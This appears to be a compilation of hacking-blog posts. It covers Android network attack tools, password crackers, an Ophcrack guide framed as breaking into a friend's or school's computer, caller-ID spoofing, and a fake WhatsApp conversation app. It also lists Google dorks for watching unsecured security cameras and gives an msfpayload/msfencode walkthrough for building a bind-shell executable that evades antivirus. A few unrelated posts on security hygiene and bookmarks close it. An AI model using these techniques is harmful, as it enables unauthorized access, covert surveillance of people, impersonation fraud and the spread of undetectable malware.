Hacking From Android Phones [ANTI]

Download (Anti)
Have an android phone, Looking for easy ways to hack like pentesters ?? Well you are in luck, Anti or Anti or Android networking Tool Kit  is Just what the world needs, another killer mobile app for android devices, Anti allows you to control other devices such as Desktop PC, other Android Phones and even iOS devices with just a few pushes

Android Network Toolkit (ANTI) is an amazing android application. You could bring all the hacking tools on PC to your Android smartphone. Using this app is as simple as pushing a few buttons, and then you can penetrate your target.

How Anti Works ?
Anti will map your network, scan for active devices and vulnerabilities, and will  display the information accordingly, Green led signals an 'Active device', Yellow led signals "Available ports", and Red led signals "Vulnerability found". Also, each device will have an icon representing the type of the device. When finished scanning, Anti will produce an automatic report specifying which vulnerabilities you have or bad practices used, and how you can exploit/fix each one of them.




Features:

Scan - This will scan the selected target for open ports and vulnerabilities, also allowing the user to select a specific scanning script for a more advanced/targeted scan.

Spy - This will 'sniff' images transferred to/from the selected device and display them on your phone in a nice gallery layout. If you choose a network subnet/range as target, then all images transferred on that network - for all connected devices - will be shown. Another feature of the Spy plugin is to sniff URLs (web sites) and non-secured (ie, not HTTPS) username/passwords logins, shown on the bottom drawer.

D.O.S - This will cause a Denial Of Service (D.O.S) for the selected target, ie. it will deny them any further access to the internet until you exit the attack.

Replace images - This will replace all images transferred to/from the target with an Anti logo, thus preventing from attacked used seeing any images on their browsers while the browse the Internet, except for a nice looking Anti logo...

M.I.T.M - The Man In The Middle attack (M.I.T.M) is an advanced attack used mainly in combination with other attack. It allows invoking specific filters to manipulate the network data. Users can also add their own mitm filters to create more mitm attacks.

Attack - This will initiate a vulnerability attack using our Cloud service against a specific target. Once executed successfully, it will allow the attack to control the device remotely from your phone.

Report - This will generate a vulnerability report with findings, recommendations and tips on how to fix found vulnerabilities or bad practices used.


For more info and Download details please visit the Following link

Worlds Fastest MD5 Hash Cracker [BarsWF]


The MD5 Message-Digest Algorithm is a widely used cryptographic hash function that produces a 128-bit (16-byte) hash value, Md5 is an encryption that cannot be reversed, the only successful way to find out the content of a md5 hash, is by running a Brute force Attack.

Barswf is a program designed to crack md5 hashes. It combines old with newer CUDA technologies. So, it uses your graphical card and if available, multiple cores to manage the cracking of md5 hashes. It's considered to be  the fasted Md5 Hash cracking tool available.

System Requirements

  • CUDA version only:nVidia GeForce 8xxx and up, at least 256mb of video memory.
  • LATEST nVidia-driver with CUDA support.Standard drivers might be a bit older (as CUDA 2.0 is still beta)
  • CPU with SSE2 support (P4, Core2Duo, Athlon64, Sempron64, Phenom).
  • Recommended 64-bit OS (WinXP 64 or Vista64). 32-bit version is also available.

Download 

AMD BROOK Beta 0.9:
BarsWF Brook x64
BarsWF Brook x32

CUDA 0.B:
BarsWF CUDA x64
BarsWF CUDA x32

SSE2:
BarsWF SSE x64
BarsWF SSE x32 

Trace IP address from Emails




In todays post i will Explain  how one can trace IP address from emails Headers. If you deal with Computer Security and Penetration testing , you must be knowing the importance on IP address . To perform any kind of penetration testing or hacking you first need to know the IP address . Here I am going to discuss how to obtain IP address from Gmail  and Yahoo.

Gmail :
Open the mail you have received from your friend and click on the down arrow to the
 right of the reply button. Now click on Show Original.




You will get to see the complete headers of the mail from which you have to find 

the IP from which this mail   was sent. Mostly in case of a static IP, the IP is shown as in the figure.


Yahoo:
Open the mail and click more option, click on 'View Full headers'
 Again over here you will get to see the IP in the same format as in gmail, shown above.

Hack Windows Password Using Ophcrack


Ever wanted to login to your friends/schools computer  which is password protected or  you’ve lost your Windows password and you've logged out of your computer. If you are in one of these situations you can use Ophcrack to hack/recover your passwords  .In this tutorial i will Explain how to hack windows password using Ophcrack

Things we Need :-

1. Ophcrack Live cd or Flash drive .You can download it from Here 
Note :-If u don't know how to make Ophcrack Live CD /Usb  you can have look at my previous Tutorial from Here   
Steps :-

1. First plug in your Ophcrack Live cd/usb .Now restart your computer and go to boot menu by  pressing ( f12 or del key ) now select your booting device as CD/USB accordingly

2. Now You will be presented with the Ophcrack LiveCD menu. Leave the default selected and hit enter on your keyboard (or just wait 5 seconds for it to automatically boot).

3. Slax, the version of Linux that is packaged with Ophcrack, will start up
 



4. Ophcrack will start on its own, and the passwords for each of your Windows users will be cracked and displayed on screen.



5. Write down the passwords, remove the CD from your CD/Usb  and restart your computer. Now you can log in to Windows .


By  this way we are able to hack/recover windows Password  .I hope you liked the post if you have any doubts please be free to comment

Best Password Cracking Tools

Cain and Abel :- The top password recovery tool for Windows. This Windows-only password recovery  tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. 
Download:- http://www.oxid.it/cain.html


John the Ripper :- A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches.
Download:- http://www.openwall.com/john/  


THC Hydra :- A Fast network authentication cracker which support many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.
Download:- http://freeworld.thc.org/thc-hydra/


L0phtcrack :- Windows password auditing and recovery application  

L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc).


Download:- http://download.insecure.org/stf/lc5-setup.exe
                  http://download.insecure.org/stf/lc5-crack.zip (keygen) 


Pwdump :- Windows password recovery tool.
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.





RainbowCrack :- An Innovative Password Hash Cracker.
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. 




Brutus :- A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more.

How to Make a Spoofed call [crazycall.net]

Caller ID is one of those things that many of us both love and hate. It’s great because if you are getting a call from that annoying neighbor down the street, you can skip it. However, it’s bad at times if the caller ID isn’t who you think it is .this method of using some ones number is called Caller ID spoofing


Caller ID spoofing is the act of making the telephone network to display any desired (Fake) number on the recipients Caller ID . It displays the fake number instead of the original number.With Caller ID spoofing we can make a call appear to have come from any phone number that we  wish. Have you ever wondered how to perform Caller ID spoofing? Read on to know how to a make a spoofed call  in few easy steps
Steps:
1. First a fall go to this site http://www.crazycall.net/
   



2. Select the country you are calling from, choose the Caller-ID you want to display
    and enter the number you  want to call.

3. Press "Get me a code" Now you will be  provided  with a number and a code.

4. Call the number Enter the code when it asks

5. Now you will  be connected to the desired number with a fake Caller ID that you set

NOTE :  By Reading this tutorial You agree that this tutorial is intended for educational purposes only.

Windows Password Cracker [Ophcrack]

Ophcrack  is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Download : Ophcrack

Features:
  • Runs on Windows, Linux/Unix, Mac OS X, ...
  • Cracks LM and NTLM hashes.
  • Free tables available for Windows XP and Vista.
  • Brute-force module for simple passwords.
  • Audit mode and CSV export.
  • Real-time graphs to analyze the passwords.
  • LiveCD available to simplify the cracking.
  • Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
  • Free and open source software (GPL).

Creating a bootable Ophcrack flash drive:

In the following tutorial, I will explain how to create an All In One USB Ophcrack Flash Drive. which can be used to recover, reveal or crack both Windows XP and Windows Vista login passwords.
  1. First download the Ophcrack XP Live CD ISO form the above link
  2. Insert your USB Flash Drive
  3. Download and run Universal USB Installer, select OphCrack XP, and follow the onscreen instructions
  4. Create a folder named vista_free inside the tables folder on your USB Flash Drive
  5. Download and unzip the tables_vista_free. zip to the tables/vista_free folder on your USB Flash Drive
  6. Reboot your PC and set your system to boot from the USB device
Hope this information helps you .In my next tutorial I will explain How to Hack windows password using Ophcrack Live CD/USB .


7 Computer Security Protocols that should be Mandatory


Computer security entails protecting of the computer and the computer software from data loss, destruction and authorized access. There are several computer protocols put in place to ensure that chances of above mentioned are reduced or totally eliminated, they include practices carried out or installation of certain software or programs on the computer to enable and improve security.

Among the 7 computer security protocols that should be mandatory are


1. Using certified genuine Operating Systems - to ensure that your computer is secure from data loss, possible damage and software malfunctions ensure that you purchase and use the genuine operating systems. Always desist from installing any software that cannot be trusted.

2. Protecting home and private computers – always ensure that your Personal computers are adequately protected to eliminate possible risk. Always lock your screens wherever you leave your computer be it at home or in the office. You should also ensure that you make use of available anti – virus for your computer and also computer software should be updated always in good time.
3. Encrypting sensitive locally stored files - Windows Operating System usually comes with file encryption features, which are usually in-built. There are other encryption programs that can assist in encryption work such as the TrueCrypt utility among others. These programs easily integrate well with windows explorer.

4. Encrypting of personal information that is stored in cloud – though vendors of cloud storage vendors will normally assure that the data you have stored in cloud is utterly safe, it’s strongly advised that you encrypt it to avoid it getting to the wrong hands.

5. Preventing Keystroke loggers and other data snoops - ensure that your firewall and antivirus are in good working order to eliminate vulnerability of your systems from computer criminals, they attack when there is weakness and easy access. There are so many antivirus software’s available online. User must choose best-rated antivirus software for his PC.

6. Manual virus scanning - sometimes viruses sneak through even when there are automatic updates and regular malware scans, so it’s advisable to occasionally perform the scan manually.

7. Destroying old data – old and unused data should be properly destroyed preferably using utilities that are erase secure. This prevents data which sometimes is sensitive from falling into wrong hands.
The above 7 computer security protocols should be mandatory to ensure that the data and software in your computer is totally safe.

Ensure that all data is secured with strong encryptions, use genuine trusted software and programs and constantly update and scan your computer to improve on security. Keep your computer safe.

Use These Google Dorks to Access Security Cameras in the Open!

What the!? This guy does not know he is being watched!

Are you aware that there is no such thing on the internet as, “Hiding in plain sight”? Some network administrators just aren’t thinking when they install the security system… I mean really, I thought it was about security!? The following is a list of Google Dorks you can use to lookup IP Security Cams whose access nobody bothered to put security on. Yeah, they are convenient to watch the shop from home… but not just for the boss, also for the entire rest of the world! Ha ha ha!

Security Cam Google Dorks:

  • inurl:”CgiStart?page=”
  • inurl:/view.shtml
  • intitle:”Live View/ — AXIS”
  • inurl:iview/view.shtml
  • inurl:ViewerFrame?M0de=
  • inurl:ViewerFrame?M0de=Refresh
  • inurliaxis-cgi/jpg
  • inurliaxis-cgi/mjpg (motion-JPEG) (disconnected)
  • inurl:view/indexFrame.shtml
  • inurliview/index.shtml
  • inurliview/view.shtml
  • liveapplet
  • intitle:”live view” intitle:axis
  • intitleiliveapplet
  • allintitle:”Network Camera NetworkCamera” (disconnected)
  • intitleiaxis intitle:”video server”
  • intitleiliveapplet inurl:LvAppl
  • intitle:”EvoCam” inurl:”webcam.html”
  • intitle:”Live NetSnap Cam-Server feed”
  • intitle:”Live View/ — AX|S”
  • intitle:”Live View/ — AXIS 206M”
  • inti’r|e”‘l ive View / — AXIS 706W”
  • intitle:”Live View/ — AXIS 210?
  • inurl:indexFrame.shtml Axis
  • inurl1″MultiCameraFrame?Mode=Motion” (disconnected)
  • intitleistart inurl:cgistart
  • intitle:”WJ-NTI 04 Main Page”
  • intitleisnc-220 inurl:home/
  • intitleisnc-cs3 inurl:home/
  • intitleisnc-r230 inurl:home/
  • intitle:”sony network camera snc-pl ?
  • intitle:”sony network camera snc-ml ?
  • site:.viewnetcam.com -www.viewnetcam.com
  • intitle:”Toshiba Network Camera” user Iogin
  • intitle:”netcam live image” (disconnected)
  • intitle:”i-Catcher Console — Web Monitor”

So there you have it, you creep! Now you can go creeping around and looking at people who don’t know you are looking at them… Weirdo!


Bypass Antivirus Detection - Making An Executable FUD


In this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Their are lots of approaches, however here we will take a look at how to make an executable FUD using msfencode.

Requirements :   Metasploit (comes on BackTrack or Kali)


Attention
We are using some harmless test files but don’t infect people with any real viruses. That would be a crime.

Purpose

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won’t spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:
cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file as shown below:

Analyzing the Listener with VirusTotal

Click the “Choose File” button. Navigate to /root and double-click the listen.exe “listen.exe” appears in the “Choose File” box, as shown below:


In the virustotal web page , Click the “scan it” button!
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that many of the antivirus engines detected the file: 33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener

this process will encode the listener, & insert it into an innocent SSH file.
In BackTrack/Kali, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now: 21 out of 42, when I did it, as shown below. You may see different numbers.

Encode the Listener Again This process will encode the listener with several different encodings.
In BackTrack/Kali, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*
 You should see several files as shown below:

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.

Create Fake WhatsApp Conversation [Whatsaid.apk]


Steps:

Step 1: First Download WhatSaid APK file.

Step 2: Now transfer WhatSaid APK File to your android phone and install WhatSaid App normally.

Step 3: After installing the WhatSaid App you will notice WhatSaid App is similar to  WhatsApp one.

Step 4: Now its time to create fake conversation by writing friend name and by uploading friend picture and by writing fake conversation.

Step 5: You can also share this fake WhatsApp conversation in Facebook and Messages.

Have Fun Enjoy.For any query feel free to comment below.



Avoid “Quick Formatting” Flash Drives to Prevent File Recovery

 It’s actually quite easy to recover deleted files using a free file recovery program such as Recuva But did you know that files can even be recovered from flash drives that have been formatted? Well, it’s true, and it’s just as easy as recovering files that have been “deleted”. 

If you format your drives using the “Quick Format” option, the files on the drive won’t actually be over-written as the drive is formatted. Instead, only the “pointers” to the files are wiped out, leaving the files themselves intact and easily recoverable.
This is usually not a problem, but if some of the files on a formatted drive are sensitive in nature, anyone at all could use a file recovery program to retrieve them.
Luckily, there’s a very simple solution if you really want to overwrite everything on a drive to prevent your files from being recovered. Simply uncheck the “Quick Format” option in the Format dialog box before you click the “Start” button. Refer to the screenshot below:

Format your flash drives without the “Quick Format” option and you’ll be able to rest assured that your files cannot be recovered by someone else.

Save Bookmarks Online And Access Them From Any Device, Anywhere

Listango : Listango is a best tool or website which help us to save bookmarks online and access them from anydevice, anywhere.Also if you want to create such type of bookmarks list which is not public means only you can see or access that list then this website if for you specialy. Because Listango helps you to create private bookmarks list.


Feature’s Of Listango:

1. Access Your Bookmarks From Anywhere: You can access your bookmarks from any computer, phone or tablet. Listango works on all modern web browsers.

2. Make Public Or Private Bookmarks List: If You don’t want to share your bookmarks with the whole world. Create private lists that only you can view.

3.Share Bookmarks With Friends Using Social Sites: You can easily share your bookmarks with friends. You can share your bookmarks using Facebook, Twitter, or email.



How To Use Listango To Save Bookmarks Online:

Step 1: Visit the Listango and signup using Facebook or via Email.
Step 2: Now drag the listango button on the Bookmarks Bar.As shown below in screenshot.

Step 3: OK if you want to save any Bookmarks.Just visit the website and drag them into Listango Bookmarks bar.


Video Tutorial: